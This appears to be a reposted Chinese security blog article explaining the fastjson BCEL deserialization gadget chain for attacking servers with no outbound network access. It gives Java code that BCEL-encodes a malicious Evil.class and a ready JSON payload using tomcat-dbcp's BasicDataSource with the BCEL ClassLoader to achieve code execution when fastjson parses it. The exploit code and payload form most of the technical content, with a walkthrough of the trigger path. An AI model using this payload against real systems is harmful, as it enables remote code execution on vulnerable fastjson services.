当前位置：首页 > news >正文

fastjson不出网打法—BCEL链

news 2025/11/27 11:10:13

前言

众所周知fastjson公开的就三条链，一个是TemplatesImpl链，但是要求太苛刻了，JNDI的话需要服务器出网才行，BCEL链就是专门应对不出网的情况。

实验环境

fastjson1.2.4

jdk8u91

dbcp 9.0.20

什么是BCEL

BCEL的全名应该是Apache Commons BCEL，它是一个库。这个库里面有类叫com.sun.org.apache.bcel.internal.util，而这个类里面有一个classLoader类，ClassLoader类里面有一个loadClass方法，如果满足class_name.indexOf("$$BCEL$$") >= 0，那么就会调用createClass这个方法。

我们跟踪进createClass方法看看，可以看到这里会对进来的数据进行解码，所以我们传payload时要进行编码。

所以我们BCEL代码应该是这样的，这里读取盘下的Evil.class文件，然后经过BCEL编码，再加上$$BCEL$$去绕过我们前面的if判断使其解码，最后再借助classLoader.loadClass去加载我们的恶意代码。可能不知道我在说啥，我说白了就是，在不出网的环境中你主机无法去请求http的资源，那么我就把恶意代码转换成字节码传进去，通过调用里面的方法使其执行。

import com.sun.org.apache.bcel.internal.classfile.Utility;
import org.springframework.util.FileCopyUtils;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;public class fastjsonBcel {public static void main(String[] args) throws Exception {//不考虑fastjson情况就正常调用该类ClassLoader classLoader = new ClassLoader();byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));String code = Utility.encode(bytes,true);classLoader.loadClass("$$BCEL$$"+code).newInstance();//将文件转为字节码数组public static byte[] fileToBinArray(File file){try {InputStream fis = new FileInputStream(file);byte[] bytes = FileCopyUtils.copyToByteArray(fis);return bytes;}catch (Exception ex){throw new RuntimeException("transform file into bin Array 出错",ex);}}}

fastjson

那么我们该如何把这个方法和fastjson结合起来呢，可以结合tomcat-dbcp这个类进行组合达到触发fastjson，tomcat-dbcp里面有一个BasicDataSource类，在反序列化的时候会调用getConnection()方法，而getConnection()方法在返回的时候又会调用createDataSource()方法。

而createDataSource()方法又调用了createConnectionFactory()方法。

继续跟踪，查看createConnectionFactory()方法，可以看到这里有两个参数

this.driverClassName和this.driverClassLoader。

通过动态类加载调用我们的loadclass，如果Class.forName(driverClassName, true, driverClassLoader)中的driverClassName和driverClassLoader可控，那么我们就可以传入我们正常BCEL生成的 classLoader和BCEL绕过的代码，恰巧这里有对应的set方法，那么在fastjson反序列化中就会调用set方法来达到可控的目的。

直接看poc，我们对这个s字符串进行反序列化，成功执行代码。

public class fastjsonBcel {public static void main(String[] args) throws Exception {byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));String code = Utility.encode(bytes,true);String s = "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassName\":\"$$BCEL$$" + code + "\",\"driverClassloader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";JSON.parseObject(s);}

这里解释一下poc，指定类org.apache.tomcat.dbcp.dbcp2.BasicDataSource是为了控制上面我们说的driverClassName和driverClassLoader这两个参数，然后还指定了com.sun.org.apache.bcel.internal.util这个类，目的是触发里面的ClassLoader类和loadClass方法，使其加载我们的恶意代码，加上$$BCEL$$是为了绕过if判断，而由于触发方法会经过编码，所以我们要解码。

{{"aaa": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",//这里是tomcat>8的poc，如果小于8的话用到的类是//org.apache.tomcat.dbcp.dbcp.BasicDataSource"driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$..."}}: "bbb"
}

总结

原理不算难，说大白话就是把恶意类变成一串字符用bp直接发过去就行，但是如果要深究怎么触发方法的话就有点难度了，因为要代码审计。

最后还是要声明一下，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

fastjson不出网打法—BCEL链

前言

实验环境

什么是BCEL

fastjson

总结

相关文章：

fastjson不出网打法—BCEL链

vue2 中使用 Ag-grid-enterprise 企业版

Redis开发03：常见的Redis命令

研0找实习【学nlp】14--BERT理解

mysql之基本常用的语法

基于Linux的patroni搭建标准

2024年第十三届”认证杯“数学中国数学建模国际赛（小美赛）

Unity类银河战士恶魔城学习总结（P149 Screen Fade淡入淡出菜单）

（四）3D视觉机器人的手眼标定（眼在手外）

安达发|制造业APS智能优化排产软件的四类制造模型解决方案

命令行使用ssh隧道连接远程mysql

力扣第 71 题简化路径

使用ENSP实现OSPF

分布式下怎么优化处理数据，怎么代替Join

51单片机快速入门之中断的应用 2024/11/23 串口中断

[Java]微服务配置管理

c/c++ 用easyx图形库写一个射击游戏

Rust eyre 错误处理实战教程

面试小札：JVM虚拟机

Docker扩容操作(docker总是空间不足)

KubeSphere 容器平台高可用：环境搭建与可视化操作指南

Vue3 + Element Plus + TypeScript中el-transfer穿梭框组件使用详解及示例

【解密LSTM、GRU如何解决传统RNN梯度消失问题】

质量体系的重要

linux 错误码总结

NLP学习路线图（二十三）：长短期记忆网络（LSTM）

Unit 1 深度强化学习简介

laravel8+vue3.0+element-plus搭建方法

并发编程 - go版

Golang——9、反射和文件操作